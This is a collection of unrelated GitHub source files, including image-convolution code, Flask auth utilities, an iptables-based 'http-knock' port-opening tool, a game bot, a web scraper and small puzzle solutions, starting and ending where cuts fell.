- 1) // 2 + height), ((size - 1) // 2):((size - 1) // 2 + width)] = imgGray\n img_conv = []\n for i in range(height - size + 1):\n row = []\n for j in range(width - size + 1):\n input = imgGray[i:i + len(conv_filter), j:j + len(conv_filter)]\n row.append(np.sum(np.multiply(input, conv_filter)))\n img_conv.append(row)\n return np.array(img_conv)\n\n\n# The function take in the kernel size, mean, and variance as inputs to create a gaussian filter\ndef gaussian_kernel(kernel_size, mean, variance):\n kernel = np.zeros((kernel_size, kernel_size))\n for i in range(kernel_size):\n for j in range(kernel_size):\n x, y = i - mean[0], j - mean[1]\n # gaussian kernel function\n kernel[i, j] = np.exp(-(x ** 2 + y ** 2) / (2 * variance)) / (2 * np.pi * variance)\n # kernel = normalized_grayscale(kernel)\n print('Gaussian Kernel of size', kernel_size, \"x\", kernel_size, \", mean\", mean, \", variance\", variance)\n return kernel\n\n\n# The formula of Laplace Gaussian operator\ndef laplacian_of_gaussian(x, y, sigma):\n # Formatted this way for readability\n nom = (y ** 2) + (x ** 2) - 2 * (sigma ** 2)\n denom = 2 * np.pi * (sigma ** 6)\n expo = np.exp(-((x ** 2) + (y ** 2)) / (2 * (sigma ** 2)))\n return (nom * expo / denom)\n\n\n# Generate Laplace Gaussian filter with sigma and size as input\ndef create_log(sigma, kernel_size):\n w = (np.ceil(float(kernel_size) * float(sigma)))\n if w % 2 == 0:\n w = w + 1\n l_o_g_mask = []\n w_range = int(np.floor(w / 2))\n for i in range(-w_range, w_range + 1):\n for j in range(-w_range, w_range + 1):\n l_o_g_mask.append(laplacian_of_gaussian(i, j, sigma))\n l_o_g_mask = np.array(l_o_g_mask)\n l_o_g_mask = l_o_g_mask.reshape(int(w), int(w))\n return l_o_g_mask\n\n\n# Convolution operation based on Laplace Gaussian filter\ndef laplacian_convolution(imgGray, kernel_size, sigma):\n log_mask = create_log(sigma, kernel_size)\n img_log = convolution_operation(imgGray, log_mask)\n norm = (img_log - np.min(img_log)) / (np.max(img_log) - np.min(img_log))\n img_log 
= img_log * norm * 255\n return img_log\n\n\nconvolution_fixed()\nimg = image.imread('dog.jpg')\nimgGray = grayscale(img)\n# generation of a gaussian filer with 200*200 size, [80, 100] mean and 50 variance\ngaussian_filter = gaussian_kernel(200, [80, 100], 50)\nplt.imshow(gaussian_filter, cmap='gray')\nplt.title('Gaussian Kernel')\nplt.show()\n# Gaussian filter based convolution operation\nimg_conv_gaussian = convolution_operation(imgGray, gaussian_kernel(7, [4, 3], 30))\nplt.imshow(img_conv_gaussian, cmap=\"gray\")\nplt.title('Blurred image with Gaussian convolution')\nplt.show()\n# Laplace Gaussian filter based convolution operation\nimg_laplacian = laplacian_convolution(imgGray, 7, 1)\nplt.imshow(img_laplacian, cmap=\"gray\")\nplt.title('Laplace operation')\nplt.show()\n","repo_name":"Wenfeng-Zhu/CV-DL-Visual-Synthesis","sub_path":"exercise-1/exercise-1-task-2.py","file_name":"exercise-1-task-2.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31771015072","text":"from difflib import SequenceMatcher\ndef scour(find, tlist):\n x = 0\n def ke(z):\n return SequenceMatcher(None, z, find).ratio() * -1\n try:\n while tlist[x]:\n SequenceMatcher(None, tlist[x], find).ratio()\n #print comp[x] + \" compared to \" + find;\n x = x + 1\n except IndexError:\n tlist.sort(key=ke)\n return tlist\n","repo_name":"notanewbie/BRIAN","sub_path":"findtext.py","file_name":"findtext.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36705384132","text":"from slacker import Slacker\nimport os\nimport jwt\nfrom flask import jsonify, Response, request\nfrom config import SECRET,ALGORITHM, BRANDI_TOKEN, CHANNEL_ID\nfrom functools import wraps \nfrom connection import get_connection\nfrom model.account_dao import AccountDao\n\naccount_dao = AccountDao()\n\ndef login_decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n token = request.headers.get('Authorization', None)\n\n if not token: \n return error_code({'error':'A1041'})\n\n try:\n db_connection = get_connection()\n except Exception as exception:\n return error_code({'error':'A1043'})\n\n try:\n decoded_token = jwt.decode(token, SECRET, ALGORITHM)\n account_id = decoded_token['account_id']\n is_master = account_dao.check_master(db_connection, {'account_id':account_id})\n \n if is_master:\n request.account_id = decoded_token['account_id']\n request.is_master = True\n else:\n request.account_id = decoded_token['account_id']\n request.is_master = False\n \n except jwt.exceptions.DecodeError as exception:\n return error_code({'error':'A1042', 'programming_error':exception})\n finally:\n try:\n if db_connection:\n db_connection.close()\n except Exception as exception:\n return error_code({\"error\":\"C0003\", 'programming_error':exception})\n\n return func(*args, **kwargs) \n return wrapper\n\ndef master_only(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n\n token = request.headers.get('Authorization', None)\n\n if not token: \n return error_code({'error':'A1041'})\n\n try:\n db_connection = get_connection()\n except Exception as exception:\n return error_code({'error':'A1043'})\n\n try:\n decoded_token = jwt.decode(token, SECRET, ALGORITHM)\n account_id = decoded_token['account_id']\n is_master = account_dao.check_master(db_connection, {'account_id':account_id})\n\n if is_master:\n request.account_id = decoded_token['account_id']\n 
request.is_master = True\n else:\n return error_code({'error':'A1043'})\n\n except jwt.exceptions.DecodeError as exception:\n return error_code({'error':'A1042', 'programming_error':exception})\n return func(*args, **kwargs) \n return wrapper\n\ndef error_code(error_dict):\n \"\"\" 에러코드 및 에러메세지 관리\n args: \n {'error' : \"에러 코드 번호\", 'programming_error: exception} \n Returns: \n Error message & code dictionary\n Authors: 김수정 / 홍성은\n History:\n 2020-10-27 : 초기 생성\n \"\"\"\n codes = {\n # A (Account)\n # 로그인 A1010\n 'A1011' : {'message': 'INVALID USER', 'client_message': '아이디를 확인하세요', 'code': 401}, \n 'A1012' : {'message': 'WRONG PASSWORD', 'client_message': '비밀번호를 확인하세요', 'code': 401}, \n 'A1013' : {'message': 'KEY_ERROR', 'client_message': '필수정보를 입력하세요', 'code': 401}, \n 'A1014' : {'message': 'NOT VALIDATED YET', 'client_message': '입점 승인 후 이용 가능합니다', 'code': 401}, \n\n # 회원가입 1020\n 'A1021' : {'message': 'DUPLICATED_ID', 'client_message': '중복되는 아이디 입니다.', 'code': 409},\n 'A1022' : {'message': 'INVALID_SELLER_INFO', 'client_message': '셀러 정보 없음', 'code': 400},\n 'A1023' : {'message': 'INVALID_MANAGER_INFO', 'client_message': '매니저 정보 없음', 'code': 400}, \n 'A1024' : {'message': 'DUPLICATED_KOREAN_NAME', 'client_message': '셀러명 중복', 'code': 400},\n 'A1025' : {'message': 'DUPLICATED_ENGLISH_NAME', 'client_message': '영문 셀러명 중복', 'code': 400},\n \n\n # 셀러정보보기 1030\n 'A1031' : {'message': 'NO_ACCOUNT', 'client_message': '요청한 셀러 정보 없음', 'code': 400},\n\n # 로그인 데코레이터 A1041\n 'A1041' : {'message': 'NO TOKEN', 'client_message': '로그인 이후 사용 가능합니다.', 'code': 408}, \n 'A1042' : {'message': 'INVALID TOKEN', 'client_message': '로그인 이후 사용 가능합니다.', 'code': 409}, \n 'A1043' : {'message': 'UNAUTHORIZED', 'client_message': '접근 불가능한 페이지입니다.', 'code': 403}, \n \n # 셀러 상태 변경 A1050\n 'A1051' : {'message': 'INVALID_REQUEST', 'client_message': '셀러 상태를 재확인하세요.', 'code': 400}, \n\n # 셀러 리스트 A1060\n 'A1061' : {'message': 'INVALID_PAGE','client_message':'페이지가 유효하지 않습니다.','code':400}, \n 'A1062' : {'message': 'INVALID_PAGE','client_message':'인자가 유효하지 않습니다.','code':400},\n \n # P (Product)\n # 주문하기 2010\n 'P2011' : {'message': 'INVALID_PRODUCT', 'client_message': '조회 불가능한 상품입니다', 'code': 400}, \n 'P2012' : {'message': 'INVALID_PRODUCT', 'client_message': '판매가 종료된 상품입니다', 'code': 400}, \n 'P2013' : {'message': 'INVALID_PRODUCT', 'client_message': '현재 미판매중인 상품입니다', 'code': 400}, \n 'P2014' : {'message': 'INVALID_OPTION_QUANTITY', 'client_message': '옵션과 수량을 다시 선택해 주세요', 'code': 400}, \n 'P2015' : {'message': 'INVALID_QUANTITY', 'client_message': '수량을 조정해주세요', 'code': 400}, \n\n # 상품 상태 변경 2020\n 'P2021' : {'message': 'NO DETAIL REQUEST', 'client_message': '변경 내용을 전송하세요', 'code': 400}, \n \n # O (Order)\n # 주문 상태 변경 3010\n 'O3011' : {'message': 'REQUEST DOES NOT MATCH', 'client_message': '주문의 상태를 다시 확인하세요', 'code': 400}, \n\n\n # C (공통)\n 'C0001' : {'message': 'KEY_ERROR', 'client_message': '필수정보를 입력하세요', 'code': 401}, \n 'C0002' : {'message': 'DB_ERROR', 'client_message': 'DB_Connection 실패', 'code': 501}, \n 'C0003' : {'message': 'DB_ERROR', 'client_message': 'DB_Closing 실패', 'code': 501}, \n 'C0004' : {'message': 'NO_AUTHORIZATION', 'client_message': '마스터 이외 접근 불가', 'code': 400}, \n 'C0005' : {'message': 'KEY_TYPE ERROR', 'client_message': '데이터 타입 확인하세요', 'code': 400}, \n 'C0006' : {'message': 'NO DATA', 'client_message': '데이터를 전송하세요', 'code': 400}, \n 'C0007' : {'message': 'NO_AUTHORIZATION', 'client_message': '셀러 이외 접근 불가', 'code': 400}, \n\n }\n\n if 'programming_error' in error_dict:\n 
codes[error_dict['error']]['programming_error'] = error_dict['programming_error'].args\n \n return jsonify( codes[error_dict['error']] ), codes[error_dict['error']]['code']\n \ndef check_param(essens_params):\n for key, value in essens_params:\n if key != type(value):\n return {'error':'C0005'}\n\ndef get_filter(db_connection, is_master):\n \"\"\"\n 로그인시 마스터/셀러 구분에 따라 필요한 필터를 return 합니다. \n args: \n is_master : T/F\n Returns: \n 필터\n Authors: 김수정\n History:\n 2020.11.01 : 초기 생성\n \"\"\"\n\n filter_list = [\n {\n 'id': 'sale',\n 'filterTitle': '판매여부',\n 'category': [\n {\n 'category_id': '',\n 'category_title': '전체',\n },\n {\n 'category_id': 1,\n 'category_title': '판매',\n },\n {\n 'category_id': 0,\n 'category_title': '미판매',\n },\n ],\n },\n {\n 'id': 'display',\n 'filterTitle': '진열여부',\n 'category': [\n {\n 'category_id': '',\n 'category_title': '전체',\n },\n {\n 'category_id': 1,\n 'category_title': '진열',\n },\n {\n 'category_id': 0,\n 'category_title': '미진열',\n },\n ],\n },\n {\n 'id': 'discount',\n 'filterTitle': '할인여부',\n 'category': [\n {\n 'category_id': '',\n 'category_title': '전체',\n },\n {\n 'category_id': 1,\n 'category_title': '할인',\n },\n {\n 'category_id': 0,\n 'category_title': '미할인',\n },\n ],\n },\n ]\n\n if is_master:\n filter_list.append(\n {\n 'id': 'seller_name',\n 'filterTitle': '셀러명',\n }\n )\n\n attribute_total = {'category_id':'', 'category_title':'전체'}\n attribute_result = account_dao.get_attributes(db_connection)['attributes']\n\n attributes = attribute_result.insert(0, attribute_total)\n\n filter_list.append(\n {\n 'id': 'attribute',\n 'filterTitle': '셀러속성',\n 'category': attribute_result\n }\n )\n\n return filter_list\n\ndef nav_to_dict(nav_rows):\n \"\"\"\n dao 에서 불러온 네비게이션 바를 가공합니다. \n 작성자: 김수정\n Args:\n db_connection : db\n nav_rows : 네비게이션 바 정보\n Returns:\n \"\"\"\n api_naming = {\n '홈':'home', \n '통계':'', \n '주문관리':'order', \n '취소/환불관리':'', \n '상품관리':'product', \n '고객응대관리':'', \n '기획전/쿠폰관리':'', \n '회원 관리':'account',\n '공지사항':'',\n '정산관리':'',\n '진열관리':''\n }\n \n sub_api_naming = {\n '홈':'',\n '생략':'', \n '전체주문관리':'allOrderList', #성은\n '상품준비관리':'prepareList', #성은\n '배송준비관리':'deliveryPrepareList', #성은 \n '배송중관리':'deliveryList', #성은\n '배송완료관리':'deliveryCompleteList', #성은\n '구매확정관리':'orderConfirmList', #성은\n '상품관리':'', #수정\n '상품등록':'', #성은\n '회원 관리_커뮤니티':'', \n '셀러 계정 관리':'seller', # 성은\n '셀러 정보 관리':'sellerDetail', #수정\n '회원 관리':'',\n '페널티 셀러 관리':'',\n '도매처 관리':''\n }\n\n nav_list = []\n nav_index = []\n for row in nav_rows:\n\n if row['menu_id'] not in nav_index:\n temp_dict = {}\n temp_dict['id'] = row['menu_id']\n temp_dict['menu_title'] = row['menu']\n temp_dict['main_url'] = api_naming[row['menu']]\n temp_dict['sub_menus'] = [\n {\n 'sub_menu_id' : row['sub_menu_id'], \n 'sub_menu_title': row['sub_menu'], \n 'sub_url':sub_api_naming[row['sub_menu']]\n }\n ]\n \n nav_index.append(row['menu_id'])\n nav_list.append(temp_dict)\n \n else:\n index = nav_index.index(row['menu_id']) \n nav_list[index]['sub_menus'].append(\n {\n 'sub_menu_id' : row['sub_menu_id'], \n 'sub_menu_title':row['sub_menu'], \n 'sub_url':sub_api_naming[row['sub_menu']]\n }\n )\n\n return nav_list\n\ndef send_slack(buyer_name, product_name, status_name):\n \"\"\"\n 주문의 배송상태가 변경될 때마다 slack 메세지를 전송합니다. 
\n Args:\n buyer_name : 주문자 명\n product_name : 상품명\n status_name : 현재 상품의 배송상태\n Author : 김수정\n History: \n 2020-11-01: 초기생성\n \"\"\"\n slack = Slacker(BRANDI_TOKEN)\n\n msg = f\"\"\"{buyer_name} 님이 주문하신 상품 안내 드립니다.\n 상품명 : {product_name}\n 상태 : {status_name}\n -브랜디 \"\"\"\n\n slack.chat.post_message(CHANNEL_ID, msg)","repo_name":"jake-hong/brandi_backend","sub_path":"brandi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12304,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34808110989","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nrequirements_lines = [line.strip() for line in open('requirements.txt')\n .readlines()]\ninstall_requires = list(filter(None, requirements_lines))\n\nif sys.argv[-1] == 'publish':\n os.system('python setup.py sdist upload')\n sys.exit()\n\nreadme = open('README.md').read()\nhistory = open('HISTORY.md').read().replace('.. :changelog:', '')\n\nsetup(\n name='trellostats',\n version=0.4,\n description='Trello stats for winners.',\n long_description=readme + '\\n\\n' + history,\n author='Ben Hughes',\n author_email='bwghughes@gmail.com',\n url='https://github.com/actionagile/trellis',\n include_package_data=True,\n install_requires=install_requires,\n license=\"BSD\",\n zip_safe=False,\n keywords=['trello', 'cycle_time'],\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 2.7',\n ],\n entry_points={\n 'console_scripts':\n ['trellostats=cli:cli']\n }\n\n)\n","repo_name":"ActionAgile/trellis","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73845038480","text":"import sys\nsys.dont_write_bytecode = True\nfrom utils import *\n\n\npuzzle = open('puzzle/06.in').read().splitlines()\npoints = [tuple(ints(line)) for line in puzzle]\nmin_y, max_y = min_max(lmap(fst, points))\nmin_x, max_x = min_max(lmap(snd, points))\n\ny_range = range(min_y-100, max_y+101)\nx_range = range(min_x-100, max_x+101)\ngrid = dict.fromkeys(cord for cord in itertools.product(y_range, x_range))\nfor cord in itertools.product(y_range, x_range):\n distances = defaultdict(list)\n for point in points:\n distances[pdist1(cord, point)].append(point)\n min_distance = min(distances)\n if len(distances[min_distance]) == 1:\n grid[cord] = distances[min_distance][0]\ninfinite = set.union(\n set(grid[(y, 0)] for y in y_range),\n set(grid[(y, max_x)] for y in y_range),\n set(grid[(0, x)] for x in x_range),\n set(grid[(max_y, x)] for x in x_range)\n)\ncounter = Counter(val for val in grid.values() if val not in infinite)\nprint(*counter.items(), sep='\\n')\n","repo_name":"filipmlynarski/Advent-of-Code","sub_path":"2018/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43495369225","text":"from time import sleep\nfrom move_window_left import run\nfrom mss import mss\nfrom PIL import Image\nimport pyautogui\nimport numpy as np\nimport cv2.cv2 as cv2\n\n\ndef find_white(original_image):\n image_str = np.asarray(original_image)\n gray = cv2.cvtColor(image_str, cv2.COLOR_BGR2GRAY)\n 
ret, threshold1 = cv2.threshold(gray, 240, 255, cv2.THRESH_BINARY)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (20, 1))\n closed = cv2.morphologyEx(threshold1, cv2.MORPH_CLOSE, kernel)\n closed = cv2.erode(closed, kernel, iterations=1)\n closed = cv2.dilate(closed, kernel, iterations=1)\n return closed\n\n\nframe = {'top': 92, 'left': 440, 'width': 80, 'height': 18}\nsct = mss()\n\ndef screen_record():\n while (True):\n sct.get_pixels(frame)\n img = Image.frombytes('RGB', (sct.width, sct.height), sct.image)\n new_screen = find_white(img)\n winname = \"Test\"\n cv2.namedWindow(winname)\n cv2.moveWindow(winname, 1450, 100)\n cv2.imshow(winname,new_screen)\n n_white_pix = np.sum(new_screen == 255)\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n return n_white_pix\n\ndef movement_of_the_player():\n while True:\n pix = screen_record()\n if pix>10:\n pyautogui.press('q')\n\n\n\ndef entry():\n run()\n sleep(5)\n pyautogui.click(648,468,duration=0.2)\n pyautogui.click(648,468,duration=0.2)\n sleep(10)\n pyautogui.click(810,433,duration=0.2)\n pyautogui.click(810,433,duration=0.2)\n\ndef main():\n entry()\n movement_of_the_player()\n\nif __name__ == '__main__':\n main()","repo_name":"easygame-team/Path_of_Exile","sub_path":"assault.py","file_name":"assault.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22792085593","text":"import time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom PIL import Image\n\nURL = \"http://webkinzpictureguide.shoutwiki.com/wiki/User:Gifted9/flooring\"\nURL1 = \"http://webkinzpictureguide.shoutwiki.com/wiki/User:Gifted9/wallpaper\"\npage = requests.get(URL)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\ntables = soup.findChildren('table')\nmy_table = tables[0]\n\nrows = my_table.findChildren(['tr'])\n\ntot = 0\nfor row in rows:\n tds = row.findChildren('td')\n for td in enumerate(tds):\n tot += 1\nprint(tot)\n\n\ncount = 0\nwith open('wallpapers.csv', 'w') as f:\n\n for row in rows:\n tds = row.findChildren('td')\n wallpaperName = \"1st\"\n\n for index, td in enumerate(tds):\n try:\n if (index == 0):\n wallpaperName = td.findChildren('p')[0].text.strip()\n\n img_name = wallpaperName.replace(\" \", \"\")\n\n if (index == 0):\n img_name\n elif (index == 1):\n img_name += f\"Small\"\n elif (index == 2):\n img_name += f\"Medium\"\n elif (index == 3):\n img_name += f\"Large\"\n\n img = td.findChildren('a')[0]\n image_url = \"http://webkinzpictureguide.shoutwiki.com\" + img['href']\n # print(image_url)\n\n # Open the new page to get the highres photo\n time.sleep(0 + random.uniform(0.1, 0.2)) # not to overload the server\n page2 = requests.get(image_url)\n soup_img = BeautifulSoup(page2.content, 'html.parser')\n\n fullImage = soup_img.find_all(\"td\", class_=\"filehistory-selected\")[0]\n # print(fullImage)\n\n img_link = fullImage.findChildren(\"a\")[0][\"href\"]\n print(img_link)\n\n img = Image.open(requests.get(img_link, stream=True).raw)\n\n img.save(f'./Flooring/{img_name}.png')\n count += 1\n\n except Exception as e:\n print(e)\n time.sleep(4 + random.uniform(0.3, 0.8)) # not to overload the server\n\nprint(f\"Done, downloaded {count} 
images\")\n","repo_name":"Awolize/Webkinz-room-previewer","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27968541274","text":"#!/usr/bin/env python3\nfrom flask import Flask, render_template, request\nimport subprocess\nimport socket\nimport configparser\nimport argparse\n\nimport pprint\nimport logging \nfrom logging import StreamHandler, FileHandler\n\n\napp = Flask(__name__)\n\n# read configuration file. Default file name is config.ini\ndef read_config(config_file):\n global cfg\n logger.info(\"Reading configuration file : %s\", config_file)\n cfg = configparser.ConfigParser()\n cfg.read(config_file)\n if cfg.has_section('global') is False:\n logger.error(\"Configuration file '%s' does not exits\", config_file)\n exit()\n\ndef iptables_uninstall_rules():\n logger.debug(\"iptables_uninstall_rules()\")\n logger.debug(\"Removing iptables rules\")\n rc = subprocess.run(['iptables', '-F', cfg['iptables']['chain_name'] ])\n rc = subprocess.run(['iptables', '-D', 'INPUT', '-i', cfg['iptables']['interface'], '-p', 'tcp', '-m', 'multiport', '--dport', cfg['iptables']['protected_ports'], '-j', cfg['iptables']['chain_name'] ])\n rc = subprocess.run(['iptables', '-X', cfg['iptables']['chain_name']] )\n exit()\n\ndef iptables_install_rules():\n logger.debug(\"iptables_install_rules()\")\n logger.debug(\"Installing iptables rules\")\n authorized_ip_list = cfg['iptables']['authorized_ip'].split(',')\n rc = subprocess.run(['iptables', '-N', cfg['iptables']['chain_name'] ] )\n rc = subprocess.run(['iptables', '-I', cfg['iptables']['chain_name'], '-m', 'state', '--state', 'NEW', '-j', 'LOG', '--log-prefix', 'HTTP-KNOCK - ', '--log-level', 'info'])\n for ip in authorized_ip_list:\n rc = subprocess.run(['iptables', '-I', cfg['iptables']['chain_name'], '-s', ip, '-j', 'ACCEPT'] )\n rc = subprocess.run(['iptables', '-A', cfg['iptables']['chain_name'], '-j', 'DROP' ])\n rc = subprocess.run(['iptables', '-I', 'INPUT', '-i', cfg['iptables']['interface'], '-p', 'tcp', '-m', 'multiport', '--dport', cfg['iptables']['protected_ports'], '-j', cfg['iptables']['chain_name'] ])\n\ndef iptables_check_rules():\n logger.debug(\"iptables_check_rules()\")\n rc = subprocess.run(['iptables', '-L', cfg['iptables']['chain_name'], '-n'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n if (rc.returncode != 0):\n logger.info(\"The firewall chain %s was not found. 
Creating the rules\", cfg['iptables']['chain_name'] )\n iptables_install_rules()\n else:\n logger.debug(\"Chain %s found\", cfg['iptables']['chain_name'] )\n \n\ndef iptables_display_status():\n logger.debug(\"iptables_display_status()\")\n print(\"\\nThe current firewall rules are:\\n\")\n rc = subprocess.run(['iptables', '-L', \"INPUT\", '-n'] )\n print(\"------\")\n rc = subprocess.run(['iptables', '-L', cfg['iptables']['chain_name'], '-n'] )\n\ndef iptables_get_allowed_rules():\n logger.debug(\"iptables_get_allowed_rules()\")\n result = subprocess.run(['iptables', '-L', cfg['iptables']['chain_name'], '--line-numbers', '-n'], capture_output = True, text = True)\n lines = result.stdout.splitlines()\n logger.debug(\"The current firewall rules are:\")\n ret = \"\\n\"\n logger.debug(f'\\n{ret.join(lines)}')\n return lines\n\ndef iptables_add_ip_allowed_rules(ip):\n logger.debug(\"iptables_add_ip_allowed_rules(%s)\", ip)\n result = subprocess.run([\"iptables\", \"-I\", cfg['iptables']['chain_name'], \"-s\", ip, \"-j\", \"ACCEPT\"])\n return result\n \n# get the last n lines of the f file\ndef tail(f, n, offset=0):\n proc = subprocess.run([ 'tail', '-n', n + offset, f ],capture_output = True)\n lines = proc.stdout.readlines()\n return lines[:, -offset]\n \n@app.route('/')\ndef root_page():\n found = False\n\n rules = iptables_get_allowed_rules()\n for rule in rules:\n if request.access_route[0] in rule:\n found = True\n\n if (found is False):\n logger.info(\"Adding IP to allowed list: %s\", request.access_route[0])\n iptables_add_ip_allowed_rules(request.access_route[0])\n \n last_conn_hostname = list()\n if (cfg.getboolean('global','activity_enable')):\n last_failed_connction_attempts = subprocess.run(\"tail -n %s %s | sed -n 's/\\\\(.* ..:..:..\\\\) .*SRC=\\\\(.*\\\\) DST.*/\\\\1,\\\\2/p'\" %(cfg['global']['activity_size'], cfg['global']['activity_logfile'] ) , capture_output = True, shell = True, text = True).stdout.splitlines()\n \n for attempt in last_failed_connction_attempts:\n try:\n (time, ip) = tuple(attempt.split(','))\n hostname = socket.gethostbyaddr(ip)[0]\n except OSError as e:\n hostname = \"Error: %s\" %(e.strerror)\n \n last_conn_hostname.append( (time, ip, hostname) )\n \n return render_template('index.html', IP = request.access_route[0], found = found, debug = args.debug , headers = request.headers, request = vars(request), activity_enable=cfg.getboolean('global','activity_enable') ,last_conn = last_conn_hostname)\n\ndef parse_args():\n\n parser = argparse.ArgumentParser(description='Open TCP ports with http requests')\n\n parser.add_argument(\"--fw-clear\", action='store_true',help = \"Clear the firewall\")\n parser.add_argument(\"--config-file\", default=\"./config.ini\", metavar='/some/file', help = \"File where configuration is stored\")\n parser.add_argument(\"--fw-status\", action='store_true',help = \"Display the firewall status\")\n parser.add_argument(\"--debug\", action='store_true', help = \"Enable debugging messages\")\n parser.parse_args() \n return parser.parse_args()\n\n\npp = pprint.PrettyPrinter(indent=2)\n\nlogger = logging.getLogger('log')\n \n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y%m%d %H:%M:%S')\nformatter = logging.Formatter('%(levelname)s %(asctime)s - %(message)s', datefmt='%H:%M:%S')\n\nhandler_stderror = StreamHandler()\nhandler_stderror.setLevel(logging.DEBUG)\nhandler_stderror.setFormatter(formatter)\n\nhandler_file = 
FileHandler(\"http-knock.log\")\nhandler_file.setLevel(logging.DEBUG)\nhandler_file.setFormatter(formatter)\n\nlogger.addHandler(handler_stderror)\nlogger.addHandler(handler_file)\nprint(\"\")\nprint(\"-\")\n\nargs = parse_args()\nif (args.debug == True):\n logger.setLevel(logging.DEBUG)\n\n\nread_config(args.config_file)\nif (args.fw_status == True):\n iptables_display_status()\n exit()\n \nif (args.fw_clear == True):\n iptables_uninstall_rules()\n exit()\n\niptables_check_rules()\n\n\n\nif __name__ == '__main__':\n app.run(cfg['global']['http_knock_listen_ip'], cfg['global']['http_knock_port'])\n","repo_name":"redge76/http-knock","sub_path":"http-knock.py","file_name":"http-knock.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20516175956","text":"import pytest\nfrom datetime import datetime\nfrom random import random\nimport time\n\n\n@pytest.fixture(autouse=True)\ndef check_duration(request, cache):\n key = 'duration/' + request.node.nodeid.replace(':', '_')\n\n start_time = datetime.now()\n yield\n stop_time = datetime.now()\n this_duration = (stop_time - start_time).total_seconds()\n last_duration = cache.get(key, None)\n cache.set(key, this_duration)\n if last_duration is not None:\n error_string = 'test duration over 2x last duration'\n assert this_duration <= last_duration * 2, error_string\n\n\n@pytest.mark.parametrize('i', range(5))\ndef test_slow_staff(i):\n time.sleep(random())\n","repo_name":"pawelszopa/test_tasks_pytest","sub_path":"tests/examples/test_slower.py","file_name":"test_slower.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28894762078","text":"from pickle import FALSE\nfrom . import media\nfrom . 
import app\nimport json\n\n\n# config filepath that you want to add\n# example\n\nconfig = {}\ntry:\n with open( app.root_path + '/bin/config.json', 'r') as f:\n config = json.load(f)\nexcept:\n config = {\n \"paths\":\n [\n \n ]\n }\n with open( app.root_path + '/bin/config.json', 'w') as f:\n json.dump(config, f)\n\nfor path in config['paths']:\n media.add_media(path['path'],path['name'], path['unstructured'])\n\n\n\ndef AddPath(path, name, unstructured=True):\n config['paths'].append(\n {'path':path,'name':name, 'unstructured':unstructured}\n )\n media.add_media(path, name,unstructured)\n print(path, unstructured)\n try:\n with open( app.root_path + '/bin/config.json', 'w') as f:\n json.dump(config, f)\n media.reindex\n return True \n \n except:\n return False\n \n\n\n \n\n","repo_name":"ivan-tana/MadiaLib-api","sub_path":"api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42225866850","text":"N = int(input())\nadjList = {i + 1: [] for i in range(N)}\n\n\ndef solve(start, end):\n visited = set()\n que = [(start, 0)]\n\n while len(que) > 0:\n n = que.pop(0)\n if n[0] == end:\n return n[1]\n\n visited.add(n[0])\n for i in adjList[n[0]]:\n if i not in visited:\n que.append((i, n[1] + 1))\n return -1\n\n\nfor i in range(N):\n pages = list(map(int, input().split()))\n adjList[i + 1].extend(pages)\n\nstart, end = list(map(int, input().split()))\n\n# print(adjList)\n# print(s, e)\n\nprint(solve(start, end))\n","repo_name":"mARTin-369/CodeVita-2022","sub_path":"vita1.py","file_name":"vita1.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35454891904","text":"import carla\nimport random\n\n# Connect to the client and retrieve the world object\nclient = carla.Client('192.168.1.10', 2000)\nworld = client.get_world()\n\n# Set up the simulator in synchronous mode\nsettings = world.get_settings()\nsettings.synchronous_mode = True # Enables synchronous mode\nsettings.fixed_delta_seconds = 0.01\nworld.apply_settings(settings)\n\n# Set up the TM in synchronous mode\ntraffic_manager = client.get_trafficmanager()\ntraffic_manager.set_synchronous_mode(True)\n\n# Set a seed so behaviour can be repeated if necessary\ntraffic_manager.set_random_device_seed(0)\nrandom.seed(0)\n\n# We will aslo set up the spectator so we can see what we do\nspectator = world.get_spectator()\n\n\nspawn_points = world.get_map().get_spawn_points()\n\n\n# Draw the spawn point locations as numbers in the map\nfor i, spawn_point in enumerate(spawn_points):\n 